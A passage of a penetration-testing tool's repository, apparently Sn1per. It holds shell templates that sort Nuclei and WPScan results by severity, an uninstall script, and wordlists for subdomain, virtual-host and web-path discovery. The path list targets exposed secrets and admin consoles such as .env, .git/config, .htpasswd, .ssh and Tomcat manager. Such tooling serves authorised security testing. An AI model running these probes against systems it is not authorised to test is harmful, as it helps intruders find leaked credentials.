AUTHOR='@xer0dayz' 2 | VULN_NAME='Nuclei Vulnerability Scan - HTTP' 3 | FILENAME="$LOOT_DIR/web/nuclei-http-$TARGET-port*.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | GREP_OPTIONS='-ih' 6 | 7 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 8 | MATCH="\[critical\]" 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | MATCH="\[high\]" 11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 12 | MATCH="\[medium\]" 13 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 14 | MATCH="\[low\]" 15 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 16 | MATCH="\[info\]" 17 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 18 | 19 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Nuclei_Vulnerability_Scan_-_HTTPS.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Nuclei Vulnerability Scan - HTTPS' 3 | FILENAME="$LOOT_DIR/web/nuclei-https-$TARGET-port*.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | GREP_OPTIONS='-ih' 6 | 7 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 8 | MATCH="\[critical\]" 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P1 - CRITICAL, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | MATCH="\[high\]" 11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P2 - HIGH, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 12 | MATCH="\[medium\]" 13 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 14 | MATCH="\[low\]" 15 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P4 - LOW, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 16 | MATCH="\[info\]" 17 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Nuclei Vulnerability Scan, " $1 ", " $4 " " $5 " " $6 " " $7 " " $8 " " $9 " " $10 " " $11 " " $12 " " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 18 | 19 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Vulnerability Scan - HTTPS 1' 3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443a.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="Title\:" 6 | GREP_OPTIONS='-ih' 7 | 8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | MATCH="[+]" 11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTPS_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Vulnerability Scan - HTTPS 2' 3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-https-port443b.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="Title\:" 6 | GREP_OPTIONS='-ih' 7 | 8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | MATCH="[+]" 11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTPS, https://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_1.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Vulnerability Scan - HTTP 1' 3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80a.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="Title\:" 6 | GREP_OPTIONS='-ih' 7 | 8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | MATCH="[+]" 11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /templates/passive/web/recursive/Wordpress_Vulnerability_Scan_-_HTTP_2.sh: -------------------------------------------------------------------------------- 1 | AUTHOR='@xer0dayz' 2 | VULN_NAME='Wordpress Vulnerability Scan - HTTP 2' 3 | FILENAME="$LOOT_DIR/web/wpscan-$TARGET-http-port80b.txt" 4 | OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g') 5 | MATCH="Title\:" 6 | GREP_OPTIONS='-ih' 7 | 8 | rm -f $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 9 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | cut -d\: -f2 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P3 - MEDIUM, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 10 | MATCH="[+]" 11 | egrep "$GREP_OPTIONS" "$MATCH" $FILENAME 2> /dev/null | awk -v AWK_TARGET="$TARGET" '$50=AWK_TARGET{print "P5 - INFO, Wordpress Vulnerability Scan - HTTP, http://" $50 ", " $2 " " $3 " " $4 " " $5 " " $6 " " $7 " " $8" " $9 " " $10 " " $11 " " $12" " $13 " " $14 " " $15 " " $16 " " $17 " " $18 " " $19 " " $20 " " $21 " " $22 " " $23 " " $24 " " $25}' 2> /dev/null >> $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null 12 | cat $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt 2> /dev/null -------------------------------------------------------------------------------- /uninstall.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Uninstall script for Sn1per 3 | # Created by @xer0dayz - https://sn1persecurity.com 4 | 5 | if [[ $EUID -ne 0 ]]; then 6 | echo "This script must be run as root" 7 | exit 1 8 | fi 9 | 10 | # VARS 11 | OKBLUE='\033[94m' 12 | OKRED='\033[91m' 13 | OKGREEN='\033[92m' 14 | OKORANGE='\033[93m' 15 | RESET='\e[0m' 16 | 17 | echo -e "$OKRED ____ $RESET" 18 | echo -e "$OKRED _________ / _/___ ___ _____$RESET" 19 | echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET" 20 | echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET" 21 | echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET" 22 | echo -e "$OKRED /_/ $RESET" 23 | echo -e "$RESET" 24 | echo -e "$OKORANGE + -- --=[https://sn1persecurity.com$RESET" 25 | echo "" 26 | 27 | INSTALL_DIR=/usr/share/sniper 28 | 29 | echo -e "$OKRED[>]$RESET This script will uninstall sniper and remove ALL files under $INSTALL_DIR. Are you sure you want to continue?$RESET" 30 | read answer 31 | 32 | rm -Rf /usr/share/sniper/ 33 | rm -f /usr/bin/sniper 34 | 35 | echo -e "$OKBLUE[*]$RESET Done!$RESET" -------------------------------------------------------------------------------- /wordlists/altdns.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 10 3 | 11 4 | 12 5 | 13 6 | 14 7 | 15 8 | 16 9 | 17 10 | 18 11 | 19 12 | 2 13 | 20 14 | 2009 15 | 2010 16 | 2011 17 | 2012 18 | 2013 19 | 2014 20 | 2015 21 | 2016 22 | 3 23 | 4 24 | 5 25 | 6 26 | 7 27 | 8 28 | 9 29 | a 30 | acc 31 | accept 32 | accounts 33 | adm 34 | admin 35 | admin1 36 | administrator 37 | akali 38 | akamai 39 | alpha 40 | alt 41 | america 42 | analytics 43 | api 44 | api1 45 | api-docs 46 | apollo 47 | april 48 | aws 49 | b 50 | backend 51 | beta 52 | billing 53 | boards 54 | box 55 | brand 56 | brasil 57 | brazil 58 | bucket 59 | bucky 60 | c 61 | cdn 62 | cf 63 | chef 64 | ci 65 | client 66 | cloudfront 67 | cms 68 | cms1 69 | cn 70 | com 71 | confluence 72 | container 73 | control 74 | data 75 | dec 76 | demo 77 | dev 78 | dev1 79 | developer 80 | devops 81 | docker 82 | docs 83 | drop 84 | edge 85 | elasticbeanstalk 86 | elb 87 | email 88 | eng 89 | engima 90 | engine 91 | engineering 92 | eu 93 | europe 94 | europewest 95 | euw 96 | euwe 97 | evelynn 98 | events 99 | feb 100 | fet 101 | firewall 102 | forms 103 | forum 104 | frontpage 105 | fw 106 | games 107 | germany 108 | gh 109 | ghcpi 110 | git 111 | github 112 | global 113 | hkg 114 | hw 115 | hwcdn 116 | i 117 | ids 118 | int 119 | internal 120 | jenkins 121 | jinx 122 | july 123 | june 124 | kor 125 | korea 126 | kr 127 | lan 128 | las 129 | latin 130 | latinamerica 131 | lax 132 | lax1 133 | lb 134 | loadbalancer 135 | login 136 | machine 137 | mail 138 | march 139 | merch 140 | mirror 141 | na 142 | nautilus 143 | net 144 | netherlands 145 | nginx 146 | nl 147 | node 148 | northamerica 149 | nov 150 | oceania 151 | oct 152 | ops 153 | org 154 | origin 155 | page 156 | pantheon 157 | pass 158 | pay 159 | payment 160 | pc 161 | php 162 | pl 163 | poland 164 | preferences 165 | priv 166 | private 167 | prd 168 | prod 169 | production 170 | profile 171 | profiles 172 | promo 173 | promotion 174 | proxy 175 | redirector 176 | region 177 | repo 178 | repository 179 | reset 180 | restrict 181 | restricted 182 | reviews 183 | s 184 | s3 185 | sandbox 186 | search 187 | secure 188 | security 189 | sept 190 | server 191 | service 192 | singed 193 | skins 194 | spring 195 | ssl 196 | staff 197 | stage 198 | stage1 199 | staging 200 | static 201 | support 202 | swagger 203 | system 204 | t 205 | train 206 | training 207 | team 208 | test 209 | test1 210 | testbed 211 | testing 212 | testing1 213 | tomcat 214 | tpe 215 | tr 216 | trial 217 | tur 218 | turk 219 | turkey 220 | twitch 221 | uat 222 | v1 223 | v2 224 | vi 225 | vpn 226 | w3 227 | www 228 | www3 229 | web 230 | web1 231 | webapp 232 | westeurope 233 | z 234 | -------------------------------------------------------------------------------- /wordlists/vhosts.txt: -------------------------------------------------------------------------------- 1 | 127.0.0.1 2 | admin 3 | administration 4 | ads 5 | adserver 6 | alerts 7 | alpha 8 | ap 9 | apache 10 | api 11 | app 12 | apps 13 | appserver 14 | aptest 15 | auth 16 | backup 17 | beta 18 | blog 19 | cdn 20 | chat 21 | citrix 22 | cms 23 | corp 24 | crs 25 | cvs 26 | dashboard 27 | database 28 | db 29 | demo 30 | dev 31 | devel 32 | development 33 | devsql 34 | devtest 35 | dhcp 36 | direct 37 | dmz 38 | dns 39 | dns0 40 | dns1 41 | dns2 42 | download 43 | en 44 | erp 45 | eshop 46 | exchange 47 | f5 48 | fileserver 49 | firewall 50 | forum 51 | ftp 52 | ftp0 53 | git 54 | gw 55 | help 56 | helpdesk 57 | home 58 | host 59 | http 60 | id 61 | images 62 | info 63 | internal 64 | internet 65 | intra 66 | intranet 67 | ipv6 68 | lab 69 | ldap 70 | linux 71 | local 72 | localhost 73 | log 74 | m 75 | mail 76 | mail2 77 | mail3 78 | mailgate 79 | main 80 | manage 81 | mgmt 82 | mirror 83 | mobile 84 | monitor 85 | mssql 86 | mta 87 | mx 88 | mx0 89 | mx1 90 | mysql 91 | news 92 | noc 93 | ns 94 | ns0 95 | ns1 96 | ns2 97 | ns3 98 | ntp 99 | old 100 | ops 101 | oracle 102 | owa 103 | pbx 104 | portal 105 | s3 106 | secure 107 | server 108 | sharepoint 109 | shop 110 | sip 111 | smtp 112 | sql 113 | squid 114 | ssh 115 | ssl 116 | stage 117 | staging 118 | stats 119 | status 120 | svn 121 | syslog 122 | test 123 | test1 124 | test2 125 | testing 126 | uat 127 | upload 128 | v1 129 | v2 130 | v3 131 | vm 132 | vnc 133 | voip 134 | vpn 135 | web 136 | web2test 137 | whois 138 | wiki 139 | www 140 | www2 141 | xml -------------------------------------------------------------------------------- /wordlists/web-brute-stealth.txt: -------------------------------------------------------------------------------- 1 | $defaultview?Readviewentries 2 | actuator/env 3 | actuator/health 4 | AddressBookJ2WB 5 | AddressBookJ2WE/services/AddressBook 6 | admin 7 | Admin 8 | admin-console 9 | administrator 10 | AlbumCatalogWeb 11 | api 12 | AppManagementStatus 13 | asynchPeople/ 14 | .bak 15 | .bashrc 16 | blog 17 | .bzr 18 | CFIDE 19 | CFIDE/administrator/aboutcf.cfm 20 | CFIDE/administrator/enter.cfm 21 | CFIDE/administrator/index.cfm 22 | CFIDE/administrator/welcome.cfm 23 | cgi-bin 24 | clientaccesspolicy.xml 25 | composer.json 26 | computer/ 27 | crossdomain.xml 28 | css 29 | .csv 30 | data 31 | deployment-config.json 32 | dispatcher/invalidate.cache 33 | Dockerfile 34 | .DS_Store 35 | elmah.axd 36 | en-US/splunkd/__raw/services/server/info/server-info?output_mode=json 37 | .env 38 | env 39 | errorlog.axd 40 | .ftpconfig 41 | ftpsync.settings 42 | .git 43 | .git/config 44 | .gitignore 45 | global-protect/portal/css/login.css 46 | gulpfile.js 47 | heapdump 48 | .hg 49 | home 50 | host-manager/html 51 | .htaccess 52 | .htaccess.bak 53 | .htpasswd 54 | images 55 | img 56 | index 57 | index.asp 58 | index.aspx 59 | index.htm 60 | index.html 61 | index.jsp 62 | index.php 63 | invoker/EJBInvokerServlet 64 | invoker/JMXInvokerServlet 65 | jmx-console 66 | jmx-console/HtmlAdaptor 67 | js 68 | lbs 69 | Makefile 70 | ;/..;/manager 71 | manager/html 72 | package.json 73 | phpinfo.php 74 | phpmyadmin 75 | phpMyAdmin 76 | phpMyAdmin/scripts/setup.php 77 | portal 78 | portal/info.jsp 79 | pview/ 80 | readme.md 81 | readme.txt 82 | register/check/username?username=thisaccountdoesntexist 83 | .remote-sync.json 84 | robots.txt 85 | script 86 | scripts 87 | secure/ManageFilters.jspa 88 | securityRealm/createAccount 89 | server-info 90 | server-manager/html 91 | server-status 92 | sftp-config.json 93 | signup 94 | sitemap.xml 95 | .ssh 96 | status 97 | .svn 98 | systemInfo 99 | test 100 | tomcat/manager/html 101 | trace 102 | Trace.axd 103 | .travis.yml 104 | upload 105 | uploads 106 | user 107 | userContent/ 108 | users 109 | view/All/builds 110 | view/All/newjob 111 | .vscode/ftp-sync.json 112 | .vscode/sftp.json 113 | _vti_bin/ 114 | _vti_bin/sites.asmx?wsdl 115 | _vti_bin/spsdisco.aspx 116 | _vti_inf.html 117 | _vti_pvt/service.cnf 118 | web.config 119 | web-console 120 | web-console/Invoker 121 | webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/ACreate 122 | webdynpro/dispatcher/sap.com/caf~eu~gp~example~timeoff~wd/com.sap.caf.eu.gp.example.timeoff.wd.create.ACreate 123 | wls-wsat/CoordinatorPortType 124 | wls-wsat/CoordinatorPortType11 125 | wls-wsat/ParticipantPortType 126 | wls-wsat/ParticipantPortType11 127 | wls-wsat/RegistrationPortTypeRPC 128 | wls-wsat/RegistrationPortTypeRPC11 129 | wls-wsat/RegistrationRequesterPortType 130 | wls-wsat/RegistrationRequesterPortType11 131 | wordpress 132 | wp 133 | wp-admin 134 | wp-config.php~ 135 | wp-content/plugins/easy-wp-smtp/ 136 | wp-content/plugins/easy-wp-smtp/css/style.css 137 | wp-content/plugins/easy-wp-smtp/inc/ 138 | wp-content/plugins/easy-wp-smtp/readme.txt 139 | wp-json/wp/v2/users 140 | wp-login.php?action=register 141 | xmlrpc.php 142 | --------------------------------------------------------------------------------